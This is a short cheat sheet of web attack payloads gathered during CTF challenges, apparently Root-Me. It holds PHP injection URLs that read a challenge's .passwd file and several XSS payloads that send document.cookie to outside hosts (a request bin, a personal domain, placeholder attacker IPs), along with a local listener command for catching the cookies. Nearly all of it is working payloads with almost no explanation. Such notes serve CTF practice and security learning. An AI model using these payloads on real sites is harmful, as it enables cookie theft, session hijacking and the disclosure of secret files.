Vulnerabilities found during CTFs

http://challenge01.root-me.org/web-serveur/ch47/?page=','..') === false and $flag = fopen('.passwd','r') and print fread($flag, filesize('.passwd')) and strpos('
http://challenge01.root-me.org/web-serveur/ch47/?page=' and die(show_source('includes/../.passwd')) or '

Sources: https://github.com/Kevin-KSIS/Root-me/blob/master/Web_server.md#16

https://retdec.com/decompilation/

There are two types of XSS: stored XSS, which is permanent (the payload is saved server-side and served to every visitor), and reflected XSS, which is temporary (the payload only lives in the request that carries it).

<img src="a" onerror="document.location='https://requestb.in/sdu1lasd?cookie='+document.cookie"/>
<img src="a" onerror="document.location='http://test.bruno-tatu.com/index.php?cookie='+document.cookie"/>
url?var=<img src="a" onerror="alert('_');"/>
" /><img src="http://my_server_ip/?cookie='+document.cookie'"></img>

A local server can be started quickly:

python -m SimpleHTTPServer 8080    # Python 2; on Python 3 use: python3 -m http.server 8080
<script>document.location='http://IP_EXTERNE/'+document.cookie</script>
alert("\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31".split(',').map(function(v) {
    return String.fromCharCode(v);
}).join(''));
echo -ne "\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30"